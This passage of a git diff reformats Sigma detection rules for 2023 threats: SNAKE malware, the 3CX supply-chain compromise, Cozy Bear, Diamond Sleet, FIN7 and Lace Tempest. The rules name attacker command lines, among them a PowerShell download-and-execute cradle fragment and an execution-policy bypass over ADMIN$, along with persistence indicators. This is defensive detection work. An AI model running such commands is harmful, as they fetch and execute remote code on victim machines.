https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) @@ -18,19 +17,19 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \jpsetup.exe - \jpinst.exe filter_main_cli_name: - CommandLine: + CommandLine: - jpinst.exe - jpinst - jpsetup.exe - jpsetup filter_main_cli_empty: - CommandLine: '' + CommandLine: '' filter_main_cli_null: - CommandLine: null + CommandLine: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml index 5edcbf8e7..a63d4bdaa 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml @@ -1,9 +1,7 @@ title: Potential SNAKE Malware Persistence Service Execution id: f7536642-4a08-4dd9-b6d5-c3286d8975ed status: experimental -description: Detects a specific child/parent process relationship indicative of a - "WerFault" process running from the "WinSxS" as a service. This could be indicative - of potential SNAKE malware activity as reported by CISA. +description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA. references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) @@ -20,8 +18,8 @@ detection: Channel: Security selection: ParentProcessName|endswith: \services.exe - NewProcessName|startswith: C:\Windows\WinSxS\ - NewProcessName|endswith: \WerFault.exe + NewProcessName|startswith: C:\Windows\WinSxS\ + NewProcessName|endswith: \WerFault.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml index 7ecdc532a..efcdeee56 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml @@ -1,8 +1,7 @@ title: SNAKE Malware Covert Store Registry Key id: d0fa35db-0e92-400e-aa16-d32ae2521618 status: experimental -description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' - which is a key related to SNAKE malware as described by CISA +description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml index 4a09b45da..e8c30e58a 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml @@ -1,9 +1,7 @@ title: Potential Encrypted Registry Blob Related To SNAKE Malware id: 7e163e96-b9a5-45d6-b2cd-d7d87b13c60b status: experimental -description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" - key with an uncommon name. This could be related to SNAKE Malware as reported - by CISA +description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) @@ -22,11 +20,10 @@ detection: selection: ObjectName|contains: \SOFTWARE\Classes\.wav\OpenWithProgIds\ filter_main_wav: - - ObjectName|endswith: .AssocFile.WAV - - ObjectName|contains: .wav. + - ObjectName|endswith: .AssocFile.WAV + - ObjectName|contains: .wav. condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - Some additional tuning might be required to tune out legitimate processes that - write to this key by default + - Some additional tuning might be required to tune out legitimate processes that write to this key by default level: medium ruletype: Sigma diff --git a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml index 555982a44..c1217463b 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml @@ -1,9 +1,7 @@ title: SNAKE Malware Service Persistence id: b2e60816-96b2-45bd-ba91-b63578c03ef6 status: experimental -description: Detects the creation of a service named "WerFaultSvc" which seems to - be used by the SNAKE malware as a persistence mechanism as described by CISA in - their report +description: Detects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report references: - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF author: Nasreddine Bencherchali (Nextron Systems) @@ -20,7 +18,7 @@ detection: selection: Provider_Name: Service Control Manager EventID: 7045 - ServiceName|contains: WerFaultSvc + ServiceName|contains: WerFaultSvc # Note: The report contains a "," in the name ("WerFaultSvc,"). Since we can't confirm if its a typo or not we don't use it ImagePath|startswith: C:\Windows\WinSxS\ ImagePath|endswith: \WerFault.exe condition: system and selection diff --git a/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml b/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml index 583551f6b..fe135e832 100644 --- a/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml +++ b/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml @@ -1,20 +1,20 @@ title: Potential Compromised 3CXDesktopApp Execution id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental description: Detects execution of known compromised version of 3CXDesktopApp references: @@ -36,6 +36,7 @@ detection: Channel: Security selection_hashes_1: Hashes|contains: + # 3CX Desktop 18.12.407 - SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC - SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 - SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE @@ -45,6 +46,7 @@ detection: - MD5=BB915073385DD16A846DFA318AFA3C19 - MD5=08D79E1FFFA244CC0DC61F7D2036ACA9 - MD5=4965EDF659753E3C05D800C6C8A23A7A + # 3CX Desktop 18.12.416 - SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 - SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 - SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 @@ -54,6 +56,7 @@ detection: - MD5=9833A4779B69B38E3E51F04E395674C6 - MD5=704DB9184700481A56E5100FB56496CE - MD5=8EE6802F085F7A9DF7E0303E65722DC0 + # 3CXDesktopApp MSI - SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 - SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 - SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA @@ -61,37 +64,37 @@ detection: - MD5=F3D4144860CA10BA60F7EF4D176CC736 - MD5=0EEB1C0133EB4D571178B2D9D14CE3E9 selection_hashes_2: - - sha256: - - DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC - - 54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 - - D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE - - FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 - - 5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 - - A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 - - AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 - - 59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 - - sha1: - - 480DC408EF50BE69EBCF84B95750F7E93A8A1859 - - 3B43A5D8B83C637D00D769660D01333E88F5A187 - - 6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA - - E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1 - - 8433A94AEDB6380AC8D4610AF643FB0E5220C5CB - - 413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5 - - BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA - - BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E - - md5: - - BB915073385DD16A846DFA318AFA3C19 - - 08D79E1FFFA244CC0DC61F7D2036ACA9 - - 4965EDF659753E3C05D800C6C8A23A7A - - 9833A4779B69B38E3E51F04E395674C6 - - 704DB9184700481A56E5100FB56496CE - - 8EE6802F085F7A9DF7E0303E65722DC0 - - F3D4144860CA10BA60F7EF4D176CC736 - - 0EEB1C0133EB4D571178B2D9D14CE3E9 + - sha256: + - DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC + - 54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 + - D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE + - FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 + - 5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 + - A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 + - AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 + - 59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 + - sha1: + - 480DC408EF50BE69EBCF84B95750F7E93A8A1859 + - 3B43A5D8B83C637D00D769660D01333E88F5A187 + - 6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA + - E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1 + - 8433A94AEDB6380AC8D4610AF643FB0E5220C5CB + - 413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5 + - BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA + - BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E + - md5: + - BB915073385DD16A846DFA318AFA3C19 + - 08D79E1FFFA244CC0DC61F7D2036ACA9 + - 4965EDF659753E3C05D800C6C8A23A7A + - 9833A4779B69B38E3E51F04E395674C6 + - 704DB9184700481A56E5100FB56496CE + - 8EE6802F085F7A9DF7E0303E65722DC0 + - F3D4144860CA10BA60F7EF4D176CC736 + - 0EEB1C0133EB4D571178B2D9D14CE3E9 selection_pe_1: - - OriginalFileName: 3CXDesktopApp.exe - - NewProcessName|endswith: \3CXDesktopApp.exe - - Product: 3CX Desktop App + - OriginalFileName: 3CXDesktopApp.exe + - NewProcessName|endswith: \3CXDesktopApp.exe + - Product: 3CX Desktop App selection_pe_2: FileVersion|contains: 18.12. condition: process_creation and (all of selection_pe_* or 1 of selection_hashes_*) diff --git a/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml b/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml index 5d5c4e811..6d08d787c 100644 --- a/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml +++ b/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml @@ -1,23 +1,22 @@ title: Potential Suspicious Child Process Of 3CXDesktopApp id: 63f3605b-979f-48c2-b7cc-7f90523fed88 related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental -description: Detects potential suspicious child processes of "3CXDesktopApp.exe". - Which could be related to the 3CXDesktopApp supply chain compromise +description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise references: - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ - https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ @@ -37,7 +36,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \3CXDesktopApp.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \cscript.exe - \mshta.exe diff --git a/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml b/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml index f58214a16..2c79aa6a2 100644 --- a/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml +++ b/sigma/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml @@ -1,23 +1,22 @@ title: Potential Compromised 3CXDesktopApp Update Activity id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental -description: Detects the 3CXDesktopApp updater downloading a known compromised version - of the 3CXDesktopApp software +description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software references: - https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/ - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats @@ -36,11 +35,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - --update - http - /electron/update/win32/18.12 - NewProcessName|endswith: \3CXDesktopApp\app\update.exe + NewProcessName|endswith: \3CXDesktopApp\app\update.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml b/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml index 5f606126a..3ca90b2c4 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml @@ -1,8 +1,8 @@ title: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor id: 8fa65166-f463-4fd2-ad4f-1436133c52e1 related: - - id: 2bfc1373-0220-4fbd-8b10-33ddafd2a142 - type: similar + - id: 2bfc1373-0220-4fbd-8b10-33ddafd2a142 + type: similar status: experimental description: Hunts for known SVR-specific scheduled task names author: CISA diff --git a/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml b/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml index 9cb590c3b..1ed268e58 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml @@ -1,8 +1,8 @@ title: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler id: 2bfc1373-0220-4fbd-8b10-33ddafd2a142 related: - - id: 8fa65166-f463-4fd2-ad4f-1436133c52e1 - type: similar + - id: 8fa65166-f463-4fd2-ad4f-1436133c52e1 # Security-Audting Eventlog + type: similar status: experimental description: Hunts for known SVR-specific scheduled task names author: CISA @@ -14,17 +14,15 @@ tags: logsource: product: windows service: taskscheduler - definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is - disabled by default and needs to be enabled in order for this detection to - trigger' + definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger' detection: taskscheduler: Channel: Microsoft-Windows-TaskScheduler/Operational selection: EventID: - - 129 - - 140 - - 141 + - 129 # Task Created + - 140 # Task Updated + - 141 # Task Deleted TaskName: - \defender - \Microsoft\DefenderService diff --git a/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml b/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml index 8dfaa5de3..c758c8c1a 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml @@ -1,8 +1,7 @@ title: Diamond Sleet APT Process Activity Indicators id: b5495d8d-24ad-4a44-8caf-ceae9a07a5c2 status: experimental -description: Detects process creation activity indicators related to Diamond Sleet - APT +description: Detects process creation activity indicators related to Diamond Sleet APT references: - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' uTYNkfKxHiZrx3KJ' + CommandLine|contains: ' uTYNkfKxHiZrx3KJ' condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml b/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml index 5de37b18e..e3f0b4f68 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml @@ -1,10 +1,8 @@ title: Diamond Sleet APT Scheduled Task Creation - Registry id: 9f9f92ba-5300-43a4-b435-87d1ee571688 status: experimental -description: 'Detects registry event related to the creation of a scheduled task used - by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability - - ' +description: | + Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability references: - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml b/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml index 6fe1a2552..bd2d0fd73 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml @@ -1,10 +1,8 @@ title: Diamond Sleet APT Scheduled Task Creation id: 3b8e5084-4de9-449a-a40d-0e11014f2e2d status: experimental -description: 'Detects registry event related to the creation of a scheduled task used - by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability - - ' +description: | + Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability references: - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,9 +16,7 @@ tags: logsource: product: windows service: security - definition: The Advanced Audit Policy setting Object Access > Audit Other Object - Access Events has to be configured to allow this detection. We also recommend - extracting the Command field from the embedded XML in the event data. + definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data. detection: security: Channel: Security diff --git a/sigma/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml b/sigma/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml index 8749f7b19..42d31a657 100644 --- a/sigma/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml +++ b/sigma/builtin/emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml @@ -1,8 +1,7 @@ title: Potential APT FIN7 POWERHOLD Execution id: 71c432c4-e4da-4eab-ba49-e60ea9a81bca status: test -description: Detects execution of the POWERHOLD script seen used by FIN7 as reported - by WithSecureLabs +description: Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml b/sigma/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml index 417064804..180ec761d 100644 --- a/sigma/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml +++ b/sigma/builtin/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml @@ -1,8 +1,7 @@ title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity id: 911389c7-5ae3-43ea-bab3-a947ebdeb85e status: experimental -description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs - for reconnaissance and POWERTRASH execution +description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png @@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - -noni -nop -exe bypass -f \\\\ - ADMIN$ selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - -ex bypass -noprof -nolog -nonint -f - C:\Windows\Temp\ condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml index 51baf91ce..59af99f0a 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml @@ -1,10 +1,8 @@ title: Lace Tempest PowerShell Evidence Eraser id: b377ddab-502d-4519-9e8c-5590033d2d70 status: experimental -description: 'Detects a PowerShell script used by Lace Tempest APT to erase evidence - from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team - - ' +description: | + Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml index e2da44389..b7c27b5b4 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml @@ -1,10 +1,8 @@ title: Lace Tempest PowerShell Launcher id: 37dc5463-f7e3-4f61-ad76-ba59cd02a651 status: experimental -description: 'Detects a PowerShell script used by Lace Tempest APT to launch their - malware loader by exploiting CVE-2023-47246 as reported by SysAid Team - - ' +description: | + Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml index 00260eb73..c692c3e8c 100644 --- a/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml +++ b/sigma/builtin/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml @@ -1,8 +1,7 @@ title: Lace Tempest Cobalt Strike Download id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d status: experimental -description: Detects specific command line execution used by Lace Tempest to download - Cobalt Strike as reported by SysAid Team +description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - -nop -w hidden -c IEX ((new-object net.webclient).downloadstring( - /a') condition: 